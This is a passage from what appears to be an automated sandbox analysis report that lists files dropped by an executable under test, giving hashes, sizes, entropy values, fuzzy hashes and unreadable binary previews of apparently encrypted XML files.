          SHA-512:F5018CF02E8E614E092DB27A059FA29DB6C9B6DDCA8E62F713A2FF7A5071F2F71153940C9F9E70D0873FD55C3A38AE241B5FF14666DFDD8B1A9A0A63B34E630E
          Malicious:false
          Preview:<?xml..... ...@EB.V....1.m|\..v..^i5M.G......i.&..h.6Z?..`,'...#.L.%k.m.h..c3.L..-...k..mK...q-..;..S..o{..)H....&....ja..Z.)...."SOyC...[.+n.~..o.<:....4.\.......6.+..S.P..MI.N.a.9.I.B.8........JD.......gs>.y.J..L"........>..j..mY..+....X...}5? .=kon.[7f.f....|...r..Pn..)...O.X.a .B....7...g'E..^..@R..%..b.5.p.....K....).....0..K....i.>....D..7.K..2.6{...*MU.d.......fcMtY.Y`1%..`..-.o.X..Q..`.hN..C..R.S....X.{j.A...N8.gb?aC....7,....lu..w...8nV.....x...b..G...N..}.p.....W.6.....u3....8.....Z.c..~.MaY{u.yg6........$...:y..Y.)........./?8.a#..3h....>...6....z.)....@..\I...45'.&f...$O........!.....:.'t..i......=@#q.`./TU`{...%VpG.].u.X<.IB........*5%..h..a..T..D..4+m..Z.+..c.....-|m.....Z^..(.~N.O..<...j.-..p...ok.r.e"-:.. ..M..!*..K.....j.o.......^.-7].Uo.v...Q".f./.7........L..f.HJ.o.$X..\.....RD%.....f3UP..9.}..uKH0.,..F.../..'E.qEL........*X....._.hQQQ.w...[.g.MK.<...|.D`.A.l.....=W......c.Iif/n...%...M%..u@...".... 7.#.v.f.uk.$.-.68....4
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2037
          Entropy (8bit):7.91413793323501
          Encrypted:false
          SSDEEP:48:FpQaI0P2soHoTB2CtTnHxvb9VHNCT/NDxiD:zQaI0PfoI0aRD7H8Ty
          MD5:15628805D75A765BF8BB50E549C22BC4
          SHA1:A1080A8565A470AB83AAF0379E3215219863CF43
          SHA-256:4C3A7A82D7DA8250578C32A3DD788CC2AA97955D033F645B236DA3F8E45A89C2
          SHA-512:255482CA33919033A2721658417BC615DB647151E9FAAAFC6DBA025A01E7CDB7D2204874D4898A25F9024560AAA694A8AEC3FBB5D2075C577737C016A999F6EF
          Malicious:false
          Preview:<?xmlL..p.6+.....A..R........Nz....C.t..j..:@....T...../...m.u.K*1v.i.2.......I..1h..^O.5P.eu..@._D1..B....M"wZc.6.Z......>.:.aY.......[.....Z.....//.R.`.......op...Kx.91Y...8=..O..[R.-..*q..C..../'.(.b3..G,|....... @#..4z5.<%....Fy.+....@L....)3..N..E.=A.6.m...e...M.|....d8.K.h.sQP.X..W7u..wy.9}...55%.[R.E. .Y.~l/../.h...p@&#..B..i.....n....6.C...Q....WP.;,.dC3..1...Y...Z<U.P[.G*....*..=......M.q..*.....X..?..)[..G|.{.-..~......l .?...3].XBR..Kz:".W.z.O.....\..E....I.25.W.Z.L;.S6..h......M..............U...I..U...Z.+..`....n)^...)..R&..P.d.....L.b..#.J...#.K<.D....L......>.}K..M|.T.[7o,.......-..T|.(.Yc.X..F.....j(r(s.i.D.%.v.....<*.S...S...~.WhA..u.....F;.I..../P..0..>.!+..(..4.......7.?u.....=...o].z.B.8./k:...w....z....+M>..........J./FkeZg#D..U'U ....TL<.\C..\WQ!..}>X...L.@.~..o.....H.N$.."...}.pt........96Z....F4.........x6.h.:..q..C....}..........@...:..`1KD!...,..+6..&.6.\.5..PQQ.....+s...2K..Z.+..8>..4Wri...&j..7.P =...D......kM=.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2074
          Entropy (8bit):7.899560222020253
          Encrypted:false
          SSDEEP:48:mokQ20uLOxTCrnlM/bQbs8Lk9Xhw9oLEjXZrXxlMHjoU0C2zYUu+RiD:04uLyE00whXhG0EjJIDovCmM
          MD5:4423D9152A990DFB7DAE9CB9D1C2DAFF
          SHA1:C5C90749B7D66495D4F9A1531E2016BA484A656E
          SHA-256:8BE41F54D3F77FD105280A3F557C43F398C6192AA938FC73CC638663C32312AC
          SHA-512:EA127D5B23D96D2C6D1C035DA1D702CC93A88699A1628359BEAFDA5B9CCE972CFEF774EF0367A52B77136FC5EA7EA926CC766F7B2DEB16624116A40E73EB9785
          Malicious:false
          Preview:<?xmlX....b.s.c..q...[...n..:.S0..Z.?....'DZ4...% .Rh$P.R.i.....)...+..SfA%...v.G}...m......X.Z.@8|l..{........P..P..0|e..=..KD. .}.IHVBA:......}..;.1......._ze$/.|.F..c.t.Y..O.i..5b....*.A..]..:.....x%.(..&..g-.......a.f....[*.....n.8...!&.&wx....}T.0#O.l..n..__Y..5.3}..\4.l..6.Y3.....D#G.*...b....hMX.L>..%b\..=_.z..DyNB.4\E.`.%0....3..#|t.o.^'v,..`Q.......KD:.y...<)..*..8.o..=Y...X.{.r(&GA..?L.6.^' ..pP8.\..,..x.s.......E......g."..Ij.j..&+V.>B.3....9>.)..Yh..kC ...s.^.?0.....0<p$.~...HL?.*g_.M%....J.9K..>.z........*..s.....(%3..u..~..<...3.....$..b..\..%8...mV...\...n#.=...Q.5.W.P(`.;..K9...@.g.+.G%.:...@?{=L.u.`..P..e|p.+...d<.}E.....C..pr...G...PQ..I/..}T..j...(W,'....V...zR.NF4.c}v1..z....?$.\.:A......5.Q_...z..$.3.Hd>.f..r.......6.I.>.'.X...(.R.i.....7...s.0...yv.I..)....h)c.l..6.gW..~.o..%.n...y'.b..v-..a2...#....Z....^.9..<X...............8.y1...P@.]....'...^..c..'..v.v.....b.z'..(....\|..6...ml/..]_.^....~N|pC..pi`.$.Fm...R..|#.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):878
          Entropy (8bit):7.738859553735182
          Encrypted:false
          SSDEEP:24:oR/dVdQWLmWCoEpDWcXESIPqO9JV2w1/uNiTkbD:IViM2pnXFIPfJUw1GEiD
          MD5:151B683D4173D471F023833C70F79ED2
          SHA1:0C41C9E652F70B6C3FE4EF67016EBA2F3BAEA9D6
          SHA-256:B842B0F9160355B60FA33A2A552C1BD6315B476E45456505F163EF6911AC82D5
          SHA-512:A289DA23C2FD96043DA64B7C23508457605BB235C266D765ACEAA9BC661491F9F6F0D60F1BCBDD1C9589C89B74D46B00FCC542F55D2898849AB4D34A4214AF16
          Malicious:false
          Preview:<?xml.i.:l.v...}...N.....H..B.u.......7.f.....u...).1C+tX2..X...<CF....20..4f......i^F.J.N..|....TyTP.|..T8..Y......\1V.C.....V:.......o.W[qF..."V.Q.d..p2]..(+y...G..?I.n.;..H3......l...ab|Yp.Vdm....Fo.,.X.......M...>.....;.$..m.........6........Vz..[.4_."..^.KU]..o....[..... ...4i6.z.8..:....Y.Tp.k..!.{.b........v..E...d.l..[..PT2Z.7.s.....S...[5.K...~.H=...pz..L.L....%.t>?j.<'I.)....*.j....i...F.m.7.S:.x\....!.G..V...><.f...).6."R.On<M....y.;..7#.3....).e....E..*...eo."..rz..jE.*....uCw....>.+G....g-...n......Bf.l..........*..=.^...}.....V....RF8.i[.......Ge.....8-..7&.S-....5}.&|.n.8N..V..M..[O.(..7../....x.k..q....L...R.'.......J./7.8............L...O...$..9E9....p.J...{..D.]X....t....&N.....s9...|.bf".t=(6.........z}.-.!j)x.<....r.....=._Ki..Pz.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):726
          Entropy (8bit):7.657440308085311
          Encrypted:false
          SSDEEP:12:F2GTZYSwRLtJDCNk22cdxq1DDdZmpAKwalZsHDAALTOEhzbXX5Gl8JwE2ixpZacq:F2UYBLtJDCNjxy/7mp+azAAAOKzb5nJq
          MD5:CB30D7F86A342F638C58500ACF263C30
          SHA1:EB29BB7CBD041F164F0222E065359AF0B0DA171E
          SHA-256:3B1B75C92277581D6CA87F6607D084CB03637737ABC99C3B0FADAF27829254B4
          SHA-512:67567E6F4624BF9894917EE7243C79CCE820F8B5D81E695A7D79F7E0BF26217DF80812FB5354D28D8022ED39D56C7178016F30DE352A93FFDC7F8E0F2F789DB3
          Malicious:false
          Preview:<?xml....%.)6...sx..AM.R.Q.'.\.7..F....Y!l..!...P...E.w.{._.....mc}..E.(.[.P..}r:4.k..{..Z2>A.E_....dq.(...4...T....._..[M.o.....c..U-A.>ba.`.....a.>.~.)).....:lA. ?.......t....W.a.p~:.v..B..K........c_...=...EV...H2..#.Aiv.(.&.......M..pt'}.A..tc....}.-I.....W..O{..4..iu}YTc.V..&........'HzR%.?Aw..D.A[...+...iVa.?...!..$....#bNBr.i...`0...&...`Q.a.....U%....n.+/...<.D...F.G...hmdr...,...8IMO...F.F.|!;.~.gx.]_..<Q_..z[}....Q.S.bOc!5\........)...$......ejj.1./DCD..m..[.s.....F._.....3..,<...:...>.].......LR...%......'.:Tf......j.E-..D...qM.)X.8]...`......MS/.+.[B.Q.}d.....HV.n.o_[.%.C.......},t..\..`...|..vW..W.nr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1685
          Entropy (8bit):7.896558039648319
          Encrypted:false
          SSDEEP:48:teelq61qgZk2msI/1rq/WudMX7OzHEHxiD:tjlaOxWxXa6w
          MD5:832794BAE3ACD17AE7F39143EDBC3C73
          SHA1:4ED7D5492006075C59DBE468DE313BE4AA85D970
          SHA-256:F92F0B1C36C2103B93D40ABCFD6B7732B80E284011F4E3AE95C7624DB6139EF9
          SHA-512:8B9270DA35BFC7C82578368E80F9565B042E0B483C43ECB10ABB72C0B8F50C8AD8B0F2757342C9C10BF62173D7793A3AF1FF120CCCE784379934E8E644FDB6CE
          Malicious:false
          Preview:<?xmlj.6.%.h..-....$..7p.)...G|.r%>......I..u1($<.*..`....A}.....}.E.K.O.B0y..W......R.o.v:.I.5..9...Y:Cf..;.p.N".@dS.3b...o+.iH..........%...U.sNR..jo.3*...8QA..ZC........%.....;$0Y.r..!7Bl.E.b..`.*...6M..*TI]Mk.+b.r...W.8...-.n..P.j.%.....&........w@>.3&..;<...@).r.,...;?.=e.J$..._.,N....W......2s....2_..,\B....D..PM......{.G.V....^*.fGE.l.Zw.c.?.....x....0.X.../....Q....:@.d...>..U..Wc....y.K...#.$i.HS.cgS.Z....i.&.....e......V....]..z.. ...ss.r...!...l..>_*.(...u.N.4{.meq'#'1NJ.. .a...To..f..S.#.......j..p......F..y.*l4.0g..5~.W.N.M.2.R.....s.j_.....4^&..C.~_4y1.s.) ?h...y ....3,).l....]K......A).k.K...../.....H'..A...?,_.&..M.|_...d.......K.R...zE.<.b.&..d.q....".....P&j".....|.$qSC,.0....ZW...-.ea.@.PSo.O~._....:...#+)....2.c...:Fj.1l..w<.T....k#..n.Z?...Q_.w<..Qu.(.D+...Q.u\...E.qx....P.. ..N.b(e..0,..".[f<.O..1./.d....Xx.....B..Zw.,m.....BimO. .....A...:W..]...JQ..V....?.b.S....l..3H|..C(x&....oth.(.=...P.8k..?....dL.3.;H}&....A0..q.T.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1722
          Entropy (8bit):7.8790592145372695
          Encrypted:false
          SSDEEP:48:Au0paSLAJl+j3QlLQDzcOw/ovzj425CMwI+gL9y1YiD:TzSUgfzcFIs40
          MD5:02D235AFAB60B410E71339F12B9B5E32
          SHA1:8AFBE3B9D397D2E125C23E77FA3105C1B5B3C04A
          SHA-256:1D21024273F9C09EECA888C024384AF87397CCAEA55BAE8FBCB4E79F58A8BA86
          SHA-512:BB5D0DD55DF91A4FC82A2EA66669321BC07ABCC43A18192CE3021B9F8AB8DE551CF6029DA3D790718669A581E137C2D30119BB6FB858393D5D28E0E311555E41
          Malicious:false
          Preview:<?xml.%dQF..]...b.KBrd..l...>.`.}]7.:..s..*yW...w.T.d...>MwY..d.......}...o.J."v8|.3..-5....{ ..o^.l2O2.d. ....p.j.h_F..X...].....'{......s...}..c.h.H9..w.B.@..-8ow..Sq.%...b./`6....17....jx4.-{...].....M.\.M...wnI ..Q}..I|M.1.|....6U.`.*._...PN....?..c.V.MUu."z..u"...(.v.`.3.3..}.!..=.qA......._V..i.t2......Am[.....<....U|8h.e.....e..e...[.1.D."..6j&^.!Y?L#&Dz.fs.....G. F.t..Z..X....B.dk..^.~.o..yL- :...N...b.....\\Lq..U.uD.W.....gg&...J0JX.p.uvG.l%.....].<!./.w.....%;..@1.tRZ[.(F..7[)X..e...Z..O...z....Y.J....:'e..|...FN.1.%..;.O....&.?..V.D..I...[."..+y.........^.~)g.....iYP_.b.P..DB./..@j..I.Q...g..H.d.'.w.l.c.Z0...Y.$.x..F..o..h....k....!.....;Wr5j..\. !..v..B.<...._........yT.p/..d.vU...D...N.w..%{q....COI.)Sd..3.(.L]aC2g...I.%P+._..E9vj.p.....4....\I&.....@=.d=....6.4..s?H.....C..@.-..@.=x..._.[....v.K+..}.*..p..J............W..WL.......x..&e.Zm....wN.b.uV....A...Nq.i.'......#,..~.m.v...o.........4A.1...d.....c...^..@........M.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):764
          Entropy (8bit):7.681593319338881
          Encrypted:false
          SSDEEP:12:6iZsKK5+W2wcXhToApYkraVCdfWR9HPEiLHn2+EjEVivklyvUrIjlQit5ZJbZixU:LGKK5xcXbWCtWDHnlZVivkssr0pt1Fiq
          MD5:9FD3C3163384042976EF1B041FC4C253
          SHA1:FCCDA3655E0676A8761C7D52FD8DABD91CD4662E
          SHA-256:EC29D6EE6760B9210741865E4CC22FBF566D890BB02CBC8DF0C77553859036DC
          SHA-512:D273C0A4713BBB2173863EA933EBFB4877FDE6ADC9A2991300EA1AA74E428210591A88893E9E618E28F18157D7DFD874348B0A07AD9722DB2F097FDF23E98201
          Malicious:false
          Preview:<?xmlg.;B..Jf$r=..D.h(..YL3.?.ZS.....EJHT...C..WN.>`.>g#..2@...<..!d.s......h..............v7-...{.?..o#..a X.u..._.>?..8...$....s....).......4...u[.t.}..^5)m.>f~..s.F$........$.,.Y...o..~K..X+h?jj.b...a.P..b..X)..ZH~..??.....w..p(P^..K.....0u.......?.Z....k.O?....._.Pm].....X_..2/8..\<.j.io.&......XHr.F..K.R...e)u......e.!.b..o...<1.'av..Uwc.>.zD.....o...a<OuFX.w..0'B..aa...zx......:qF...ea7.<.v..6.J.GP...b....y0.....C&UG.@_HM.U.V/.Tu.*'`....?.].p..m..?....z.jX0m...Qi2...n66.A.\.}...g:h..7J.4....0oo...^4.u.$.L.P*...Mu....=.y..C..D.{m=s.qM<...S?..Dy.....d...+K.R.$..%X.y/.q%......|rUz0Q.lg.o.8..........Q.?...D...ry.Rn(z....RNY#......C.#.\.jYp..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1691
          Entropy (8bit):7.896760974578202
          Encrypted:false
          SSDEEP:24:c/evXQdcCBVNu66OUO4pROij8rQABflax9peyPg/uexREKyX6zWM65siTkbD:cug066tO4pROzrQ6fl+6y3eHEKkZ5FiD
          MD5:AEE5F52F88B4836CD93B71C8CAAF380C
          SHA1:7978DFA5FB64C4B74A0FEB6388A8D1961051EEC4
          SHA-256:26C7243617C7E4EA75BB610A4B2C69BE7747BF5AC7F4061A55241ABBBEC58A20
          SHA-512:34AB5FC64C47750E85B5EC4005D02B27823782EDBFA84C90BAA8B072CFA90594CD0221BD07BA8DD2467500AACEE9F75584A9270D8B97FF665798D678D168B906
          Malicious:false
          Preview:<?xml..>..?R;.7J:t.w.,Ju...Wj....../.z..bv...e[ga.MWJ.......rT,c......*rT...34....J..J.JU.8./@.m.V.X..>..{....(I....;.p.U.C.v..$.M8;b...whmOvS.q.(H.kS.[%k'.Pk.XI..q.Z.M..].:.J.Y).......X..p.|.P....6=...}yV.......S.........+...#Y.B4..'E.B.nf}..........>.v..+..%y....k,l..R..4(..... ......9.$(9...&.c.r..e...(..../.....1.O.*.v..../b^G`k....r.F.}...s1%1h"..M..:.....'zj..).p.`.;t.......Ys2........e.;4gs....<rX}_i.zo...?....w.=x..N".o..I..8...3k9 -._d=.n?<..!..... <...P.....L.~|..k...Qj....aA....@...2.K....y.........B....L.4..&.q......5..x..TW.`..}..c]V..k9.....^..|.D/.:.o~k.k|&.]..M5.R.N(^*M.v~.s..#Y.u.X.`...d.gB..XS.p....{....Q...A. -.h..p..JK,..#..BN.`6........p..D..v.X.#....7d{T..O....o..[...Y.......Pr....\/P..@..:F...e.....~.J.y.5t.v..!y...~..'..RJ..$...}.G.c.....e.M.7.L?....&y.w.......E.....c.Ez..<[......*....<\.Y..\P.\swO..6.../..*.t...]....4.|.7*.)O.4..O@p/.:$..e..%I...w...XoZ.. .L...y..rg5PmH[....,.zTaG.0.Zik6..w....2.0&.5.g .3...0GD.u.%....N.9.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1728
          Entropy (8bit):7.89041873015609
          Encrypted:false
          SSDEEP:24:pzEnfAZaPtvgRaAUHosbYm+pE4rn/T+5vJNQIh8qcGiL/kBU310/N069zCPjMDr4:GfiaPFU++/ibNQ08hG8/kBJ069uY2YiD
          MD5:BD7C54AA13CF1A0855D1FD2F25A9C8BD
          SHA1:6CFE7A9A42DAA2220024EE0FEFB8A0E0AA028DBB
          SHA-256:E31EF611C8BF97A662CC9AF54ECA06BF990492D627C5D55AF554DE74EBEDE4B0
          SHA-512:5B76DD56CFE39031D8C6AB8F87B368B084B12024D8D1EDEA22C8CA332FCA0F1A3EE900E8EA401BCB5D9936654DE65C8ECF7568F7F2645026A630E68D3BDCFEE7
          Malicious:false
          Preview:<?xml....JP.k.4wc.....vS.=C.Z..?.._I.)%1.7.vs..w~LG.\.{+#.u..1cm.f..>.#.&.QX4dvd.28.wy3M.gJ?fn...x99.......l..........F.[r....(.?...R.f%.|7.i.Z....0f.g9........ MtjK.h..T...eQ.. ...;.ti..........,....&.l.j....R.b6.,.V.....M...T."$kQ.L..D....7.,..-..."%5?I.Fy...w..&..y.>_.I.d_.mP...u...0.Q..}<b6.~........i..K.G/.f.UuR....t.....o..X.....H......v_?l.l..-.r..A-..d.3b. .....(...X`.....oE+.b..hO.-.;..l...]....7[k..8..M.s.*Ku..Fa........3x...I.rN.* /k..l../.....{.Z.u..n..q~#....P1..`.....I....d...d...#&.9mmb...@..b...."....n..|.[.O.@.c....W...*.R6..,..i..:..k.-^....|..-D.b+.i(.A}.#........z._....?.-kZ|.......Z."+S.AEt.}.k./..1...&m{..HhF.I.\*..1..p.Iq..CQ...N.q8.U...&..4.8...,5{..'w...= <..6.i...........'.....S.hON|.z.[.\..../R..!Zf..B\..........7&.MQ.n.e....."AS}..:..o....g...5.~...tbz.Q!.|.*.1F.7m.R{.........A...y.J.<.....vi.....]N.w.-n.s;6.G.p6W....9{.....TfLi.|-..>`p........|T......@..8.).:.......0......_-...............0...ID<.q.&....N
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1695
          Entropy (8bit):7.8693415247931835
          Encrypted:false
          SSDEEP:48:oca7YqETWgkxbtJItbYbzzLL0omOYaeEGKmfZiD:oca7YUgCsb2zb0VfE0g
          MD5:9BFEF420B6649B179DBED9F000E05014
          SHA1:A9EFA183025435286B2775552C7F68D64E79F27C
          SHA-256:239E937105E100135030AC8A92BC31328710D30669CC44F35863A9C455268E4D
          SHA-512:CA1E4F284B82C87DBA793C4063C5BDA268E0CB877F045D5B3E29EC5D75F0734BC2069468FD4BE18180F9FD98E6F3FD6E606C1C6C360CB42101635BB98157FCE9
          Malicious:false
          Preview:<?xmlE.N.h....;>.E.8.."T.v...8..JJ.>8.....ed..u9S.;%....Y..>n`.6.KR...%.9.....&g.@.Ei.@.^...........s..@!~.j.J..f*T."..E...1.q!:x..2.dp=..J.."..)...u[R..f<t.k.....U.1..v...t...\cg...C..@7.G .....}.+j.#.F.JJ......Z^.1.t4U..]m.1.i...$:....tZ/.U-+..V..B/. ..5:Kh.8...v.q7R..)$.$.Q.k.6...8..\..M......|.T.a3|}.^.....,..o[.{....az7.......O.h..C..[...U....._..~.c.....4.D..?.L+N.....Que'.M.Jq@...{..g..U..:.h(^S^.w<_....".[O..^y."G.6P..xw.w...@.9.P.....~...0p..l#.......x,t#.X.qf.p.|@.1..h.#5..4.U....6a..b.+..!E..S..2 (_.y...V.......|..|.N.s...s.6`*Z.Y.>.......t......9.lpJ.[....^=CW...b?~.ny....3R.5...G6.Vp.U;...F.#...Kw........T.T..[..z@..c.p.%?.u0.'.O.\Q......f.....g.....\gI.....%........$.X..|..*qT=...A..t~.`.|.E.F.V....M............Z..>..G&+w..x5.c#......,Y/.(.a^.f.j.g.^..57.l...B..I^E!.....*@..L.1>2v..EVV`8.^.r...G..O'Z......e.&..h7VDyV;..O..........]P.....=....9......8.g.t.b"3..c..@.1.0..YE....,..h-:;^7.hB?.5~..Y:..`..G.>.v............q..?
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1732
          Entropy (8bit):7.878423821531899
          Encrypted:false
          SSDEEP:24:Y60FGfLhHxbs/8qSjUjIjspPTwKf8hwNd/2ieMlg1uTl5g153P0g0PpFtGiTkbD:yodVsUqSPj680cWB2i1wgK3P0LPxiD
          MD5:11A3D98EC7DA2039A19BE588AF0C3C87
          SHA1:AC26BF115F422FBD0620B15E5F2BF6F38DFFD599
          SHA-256:83F02868B950A2038138BDA28FFF8330A4024CDF2ACF95251C321449142F31FE
          SHA-512:E3117E424056BC6A772FB75AB62C93B082AA0D11998A89F66BD3195F565F68F488E42FC0BCC6AC84089C9F3F09061A829771FBDAD1F22ADA522EB3CE8C93A52A
          Malicious:false
          Preview:<?xml.........'.R\A..~..j..>...g 64...^T.o...9fF..%.....0.Hwu...^...N..SLA.../.;.....{zV.t..<;.]._...t.]...............M..Qp..r..%.J.=...]...o....;J..r...L..BG....x....3.?>..b.z.|.k....c..t....*.{'..9....!..R..R.....y.<../N...}.z>1...;.Y.......v.0....H.Q..[.E.tI..wt.......|f...Ty......BO0..;..g.......C$....`..Ew..2..C!m....*.....&.Jq.x...0..@rnG.9.^4.[m..}.L.t.....<....H...q...''......J1..9.s......w..$.tE......F.....,..j...O_.....1od.....US(....%].......O....:...#T.........X.P.D\.C.{....4..+v.*..U.BX.kY7.G1.!....]]..i..!7E Q{...MGr[A.s^.@If.....fW..4...`n..&(i........_..H.p.!...j/6........W.&N..H.!.4...a-.....$...T.+.Q.b.....y...U.{...U..T#.}\.,..V.....J?.......@.R..U..*...=........t..S...(...|.W..w.5`....p~j.cs....-.a...3.@.0)...y..L$._.....<.'c-..w...s.y(.7.....4....Q......iN.v.n)....c..C.|..A.#l.(`....*..h.b.......[..X..t=.6.IZ4_..C.Y8.&2.\.>{.R...f...C......\.O....V.=(.....D..Kt.....q..!...Tj._.o..3$'..X.F.....N..."m.[....8
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1689
          Entropy (8bit):7.885601866858213
          Encrypted:false
          SSDEEP:48:5vG6NjC89D/6wkkUkKXztGkZzYLI7Ru//eGYNGFA66deiD:5ve89D/ZknkKXZGCsL5/TYuA66dh
          MD5:699F7FC5A57B5D363AD7725B4CFD9B30
          SHA1:DFCC4C1B4776FC42DB412024BF6847703604BA39
          SHA-256:7972BC7E878CE49EF4FEC751271898D19EE56C67738D02DF0DE6D6077C279233
          SHA-512:68D240956E8BAD9613BDAB7CCBD1061B9DB620925A7465AA2047C03B7223E046B79311DB0FC742E95B8CF5DA4B9F094F3CA61249B488113552261DD427B29C1E
          Malicious:false
          Preview:<?xml.0.=|.0.O..~z..KY..[n..'.7..../.anR.!..1u..?.,...KI.8...)....{m% ....g.......'.&.....n`...Q..||H.B..&?..5b,..?...HM.G...V......42.".....;0.3........*x./.5T.....iup...&~..z..Lr.....Cw/..m$.7....J.?E#8,...(.+&....^.Za.S..V.+....y.-><p.mp..........._#.=....w...F..m.&..fp{..Gq.sv.y..6.4s7..8.;..>.K;....9!..C>#.._R....j.L..........I.._.@....1..} g.A..h....F'.t.^.... J6.T..P`).C.v.X`(.K.p...Q..Q.y.V0q)....B*.m.1.v..a].T.Y.Fy.1.Z.X.M..P.~]|*..c....i..P_v.+..e......*Ta{j...aXm.....c...A;...k.5.c........Qm5..cl.b....&wz<.Vv.QR..=.....=P....l...........j`.m:...?a...6..nj.Q...~N{$..|.Prr.[QC@........|.A:.:.+...O...CV).S.mA).,.)*1..H.#B..].AF..00.].k......KK...w....A.Jgs.Y.z..o.k.$J.y.....%/..P..e*...L.:..[....&.W.N.,4G\...4.N...B.W,..}. .5.....?.;<!...W.p.:..il.X8.v..Z.N.B.........h... $...m...f..}.X..tU.hF[....W....G......Bm...b...]...:[a.:.....d.R..A\f=.F.K..;2FY.PO......vKlz..~.X........$.[dfBC...z{.......@.....-....&s. VD...a:...]...W\.LK`.c
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1726
          Entropy (8bit):7.880631677936356
          Encrypted:false
          SSDEEP:48:5kutYq5KCRrEdRodWIjZFYoFwSjrwewt9Mw2N7M84PMiD:Oxq5KBPIvdFYo+SjNw2N7M1b
          MD5:0300D2D57E342B59827995202A080624
          SHA1:897C8DD51C2FC5183C829AB7CAD41415BE57FD1B
          SHA-256:60D424F2DE101976B147E688259312B4932485645D6CBB3E47E7F455B90915E8
          SHA-512:B35AFE840728C44C92FE6DFB4B121C7BA38EC02BA697AD8F8507C0BA12C823041ECF945D0BAD085C9DECA65276846A3F125A0A8439E46F7B3930C41E255AE485
          Malicious:false
          Preview:<?xml.hK...t.3...... .}.~..^..+...ey.9....j..f|....{._..]....#.....]...vzNa...-l.!>.P5...x._...Dm.43...F..q(C.q..........G:.u..j^....%(.^..7.#.fV...r.h.k.03{..&..M.0.Gn........dq.b.1..=#..-3..^i..........|.........6(n...6../e...6.2v..'.......1..zn...J.......-(}.c.o. 9.x)...?..?.L......}l.q........4..3....w.0....Z...R..".......m...%....L...}...H.ke}.m....<1T...`:.........bo....Ab/j...3...G)P...L...m.....tBQA.I0......T.......C...ns;........q0..J./.]......i.J...........).".k......_.9....$..A>H....^..5......F.>S....{a.F..9n.Qq...<....&x........c...4.{.y.@..i....=7.]!Q..R..e.c,..[..M..*....Q....;....$..b.ig.-....5..?.f.28,...5Q../(=_..f.w.=.9..hB..{..Y.+.8..2lCg^.Fv.....q..1|O).y.+...../..A..p"../.."..9.N.$......ts.$q`.<...G.cr..5|].-.?...e.^.,y......hT_..,.v._Jx+.k.5.q....J.....!3$)<......^2.x.....P..\*.1..c_..A..{]...1.}......qZ..N......z.1..#..6...2.s..i..d..{..'.....5.....#Hj9.W.........4..&.F..Pj.+s./..tEn.....i..'0.$..7....bw.D4.M.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1691
          Entropy (8bit):7.891885091377643
          Encrypted:false
          SSDEEP:48:yZy35uB46de/goNVLWsHgifyi/WjIXs0kiD:f35uu6LoXCsHRai/kQ
          MD5:B768852D429EB2BFC47CA03969E0B6C5
          SHA1:4FF6FE01B583C482D15BFB53474D7A3E72A1DADB
          SHA-256:C4852829AA3D8E7634B7A3C3698E94BFF7AF1C66C060724F7C6EEE1305FE5A96
          SHA-512:3C4ADA4477E62E926BF276102B3C29D04CE2140464D13A8BB466FEACEF69ED0C323EDD936640EE5B7B20D375064D2BA2007B9BCE4B09316D665E525B812A1AB7
          Malicious:false
          Preview:<?xmlg.8.5f...1.c.8..'gI.~....i..&...o.#...'.>n\..J=:@_SV...u..U{%..!...M.>.2.......^..)...<.DO$^..7...zu..7S<.F..Pq/.Q0{d..N..<>..]..m.[.`...WA.,.;7.@.,^T.L.,.Q..Z.x.K...b..V.(..p......|V~3....y.W..<r`...b......Q....A."..c..Z.......f.k......Z.{...^/O62|.^:bz.):k.}G.O..*.}.A8......sNc52c..\0.:..~."p.!@..........Y..>%.S.`sL.W...)OZ........<Y;V...+.R.........3..|P..b...:..\..@$.....y.P..*WB[9.k4.4:m........]...fA&{.(z.3y..^.X|F...&6 .~....$N...\}&..'N.....$...........NP/...JXi].....[..;+i...\.....$]..n.(..$.N.D5.{.g7.t)..~S...@.... d_..c..4...t.NQ.L.G..!..v.l0u.W....LE...K.A.^.s.4.{.7?.9H...?W.M...:..L-d..l\.m.Y..f;;..h......"......=..Y.H..~gd\.*:.c...O.5c.Ok.k..T.....4....K..A.|d...(f.S...P?...k.ZSB..ih..i.W.. .i.....4....8.+.J.5.f0f...E.ot*..%<.}......c.=...I..x.k,......U.J.J.[.o....W..@.....S.ghb...'r|...08..*....[6.f...6.>g....o.+......s...+.p-6...e>.XbekP....n..+.V..pyp..I.>..X...hWJ.o,.....)...O/....FM./..0...+.{.Y..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1728
          Entropy (8bit):7.886459110014089
          Encrypted:false
          SSDEEP:48:JrleqqE1OW0pZRj14YhnPUOoIsJNmqRmBC9gPofII9AiD:JrlvkYQMOnslmB+x9f
          MD5:D77504F9ACDB13BDC0772CF5E51B9FDE
          SHA1:7EDEAD23A2D4A88FB8C04C9B7A8C48B6AEC7C6DE
          SHA-256:54022546FE9493EE0F82F52E36ECD74E4DC4CDE7D93C67013EAE848D47FFE34B
